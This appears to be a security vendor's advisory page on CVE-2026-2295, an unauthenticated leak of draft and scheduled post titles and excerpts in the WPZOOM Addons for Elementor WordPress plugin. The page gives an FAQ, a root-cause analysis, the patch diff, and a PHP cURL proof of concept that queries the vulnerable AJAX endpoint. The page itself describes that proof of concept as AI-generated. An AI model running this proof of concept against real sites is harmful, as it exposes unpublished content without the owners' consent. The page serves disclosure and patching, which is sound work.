What is CVE-2026-2295?

CVE-2026-2295 is a medium-severity vulnerability in the WPZOOM Addons for Elementor plugin for WordPress. It allows unauthenticated users to access protected post titles and excerpts due to a missing capability check in the ‘ajax_post_grid_load_more’ function.

How does the vulnerability work?

The vulnerability arises from the AJAX handler for loading posts, which lacks proper access controls. Attackers can send a POST request to the admin-ajax.php endpoint without authentication, allowing them to retrieve titles and excerpts of draft, pending, or future posts.

Who is affected by this vulnerability?

Any WordPress site using the WPZOOM Addons for Elementor plugin version 1.3.2 or earlier is at risk. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WPZOOM Addons for Elementor plugin in your WordPress admin dashboard. If it is version 1.3.2 or earlier, your site is affected.

How can I fix or mitigate this issue?

To resolve this vulnerability, update the WPZOOM Addons for Elementor plugin to version 1.3.3 or later. This version includes a patch that restricts the AJAX query to only retrieve published posts.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability poses a risk to data confidentiality, it does not allow for complete system compromise or data modification.

What types of data can be exposed?

The vulnerability can expose titles and excerpts of posts that are in draft, pending, or scheduled statuses. This could lead to the disclosure of sensitive information or internal plans.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can use a simple PHP script to send a POST request to the vulnerable AJAX endpoint, allowing them to retrieve protected post data without authentication.

Can the vulnerability be exploited without authentication?

Yes, the vulnerability can be exploited by unauthenticated users, meaning that no login credentials or special permissions are required to access the exposed data.

What are the potential consequences of exploitation?

Successful exploitation can lead to unauthorized access to sensitive post metadata, which could aid in social engineering attacks or provide insights into unpublished content, but it does not allow for data modification.

Is there a way to prevent this vulnerability in the future?

To prevent similar vulnerabilities, ensure that all plugins are regularly updated, implement proper access controls for AJAX requests, and conduct security audits of your WordPress installations.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the WPZOOM Addons for Elementor plugin until a patch is applied to prevent potential exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2295: WPZOOM Addons for Elementor – Starter Templates & Widgets <= 1.3.2 – Unauthenticated Protected Post Exposure via ajax_post_grid_load_more (wpzoom-elementor-addons)

CVE ID CVE-2026-2295

Plugin wpzoom-elementor-addons

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 1.3.2

Patched Version 1.3.3

Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2295:
The WPZOOM Addons for Elementor plugin contains an unauthenticated information disclosure vulnerability. The plugin’s AJAX handler for loading more posts in a grid lacks proper access controls and query restrictions. This allows any site visitor to retrieve titles and excerpts from posts with draft, pending, or future statuses, violating confidentiality. The CVSS score of 5.3 reflects a medium-severity impact on data confidentiality.

Atomic Edge research identifies the root cause in the `ajax_post_grid_load_more` function within the file `wpzoom-elementor-addons/includes/wpzoom-elementor-ajax-posts-grid.php`. The function processes requests sent to the WordPress `admin-ajax.php` endpoint. The vulnerable code constructs a `WP_Query` without a capability check to verify user permissions. Critically, the query arguments array also omitted the `post_status` parameter, defaulting WordPress to include non-public posts in query results for unauthenticated requests.

Exploitation requires an attacker to send a POST request to `/wp-admin/admin-ajax.php`. The request must include the parameter `action` with the value `wpz_elementor_ajax_post_grid_load_more`. Additional POST parameters control the query, such as `posts_per_page`, `category`, `offset`, and `paged`. No authentication, nonce, or special headers are required. Attackers can iterate through pages or categories to systematically harvest protected content from the site.

The patch addresses the vulnerability with a single, surgical code change. In the `wpzoom-elementor-ajax-posts-grid.php` file, developers added the line `’post_status’ => ‘publish’,` to the `$args` array for the `WP_Query`. This modification ensures the query only retrieves posts with a public status, regardless of the user’s authentication state. The plugin version number in the main file was also incremented from 1.3.2 to 1.3.3.

Successful exploitation leads to unauthorized information disclosure. Attackers can access the titles and excerpts of draft, scheduled, or pending review posts. This exposure can reveal sensitive information, unreleased announcements, or internal editorial plans. The vulnerability does not permit modification of data or full post content access. However, the leaked metadata could facilitate social engineering, competitive intelligence gathering, or reconnaissance for further attacks.

Differential between vulnerable and patched code

Code Diff

--- a/wpzoom-elementor-addons/includes/wpzoom-elementor-ajax-posts-grid.php
+++ b/wpzoom-elementor-addons/includes/wpzoom-elementor-ajax-posts-grid.php
@@ -74,6 +74,7 @@
 			self::$settings = $data;

 			$args = array(
+				'post_status'         => 'publish',
 				'posts_per_page' 	  => absint( $data['posts_per_page'] ),
 				'post__not_in'        => get_option( 'sticky_posts' ),
 				'ignore_sticky_posts' => true,
--- a/wpzoom-elementor-addons/wpzoom-elementor-addons.php
+++ b/wpzoom-elementor-addons/wpzoom-elementor-addons.php
@@ -3,13 +3,13 @@
  * Plugin Name:       Elementor Addons by WPZOOM
  * Plugin URI:        https://www.wpzoom.com/plugins/wpzoom-elementor-addons/
  * Description:       A plugin that provides a collection of Elementor Templates and advanced widgets created by the WPZOOM team
- * Version:           1.3.2
+ * Version:           1.3.3
  * Author:            WPZOOM
  * Author URI:        https://www.wpzoom.com/
  * Text Domain:       wpzoom-elementor-addons
  * License:           GNU General Public License v2
  * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
- * Requires at least: 6.0
+ * Requires at least: 6.5
  * Tested up to:      6.9
  * Elementor tested up to: 3.99
  * Elementor Pro tested up to: 3.99

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2295 - WPZOOM Addons for Elementor – Starter Templates & Widgets <= 1.3.2 - Unauthenticated Protected Post Exposure via ajax_post_grid_load_more

<?php

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Construct the endpoint for the vulnerable AJAX handler
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Prepare the POST data matching the plugin's expected parameters
$post_data = array(
    'action' => 'wpz_elementor_ajax_post_grid_load_more', // The vulnerable hook
    'posts_per_page' => 10, // Number of posts to retrieve
    'offset' => 0, // Start from the first post
    'paged' => 1, // Page number
    // Additional optional parameters can be added here, e.g., 'category' => '5'
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing; enable in production
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the results
echo "Target: $ajax_urln";
echo "HTTP Status: $http_coden";
echo "Response:n";
echo $response;

// The response is expected to be JSON containing post data, including titles and excerpts.
// If the site is vulnerable, the response may include non-public posts.

?>

Frequently Asked Questions

What is CVE-2026-2295?
Overview of the vulnerability
CVE-2026-2295 is a medium-severity vulnerability in the WPZOOM Addons for Elementor plugin for WordPress. It allows unauthenticated users to access protected post titles and excerpts due to a missing capability check in the ‘ajax_post_grid_load_more’ function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the AJAX handler for loading posts, which lacks proper access controls. Attackers can send a POST request to the admin-ajax.php endpoint without authentication, allowing them to retrieve titles and excerpts of draft, pending, or future posts.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WPZOOM Addons for Elementor plugin version 1.3.2 or earlier is at risk. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification
To determine if your site is vulnerable, check the version of the WPZOOM Addons for Elementor plugin in your WordPress admin dashboard. If it is version 1.3.2 or earlier, your site is affected.
How can I fix or mitigate this issue?
Updating the plugin
To resolve this vulnerability, update the WPZOOM Addons for Elementor plugin to version 1.3.3 or later. This version includes a patch that restricts the AJAX query to only retrieve published posts.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability poses a risk to data confidentiality, it does not allow for complete system compromise or data modification.
What types of data can be exposed?
Information at risk
The vulnerability can expose titles and excerpts of posts that are in draft, pending, or scheduled statuses. This could lead to the disclosure of sensitive information or internal plans.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can use a simple PHP script to send a POST request to the vulnerable AJAX endpoint, allowing them to retrieve protected post data without authentication.
Can the vulnerability be exploited without authentication?
Access requirements
Yes, the vulnerability can be exploited by unauthenticated users, meaning that no login credentials or special permissions are required to access the exposed data.
What are the potential consequences of exploitation?
Impact of the vulnerability
Successful exploitation can lead to unauthorized access to sensitive post metadata, which could aid in social engineering attacks or provide insights into unpublished content, but it does not allow for data modification.
Is there a way to prevent this vulnerability in the future?
Best practices for security
To prevent similar vulnerabilities, ensure that all plugins are regularly updated, implement proper access controls for AJAX requests, and conduct security audits of your WordPress installations.
What should I do if I cannot update the plugin immediately?
Temporary mitigation steps
If you cannot update the plugin immediately, consider disabling the WPZOOM Addons for Elementor plugin until a patch is applied to prevent potential exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations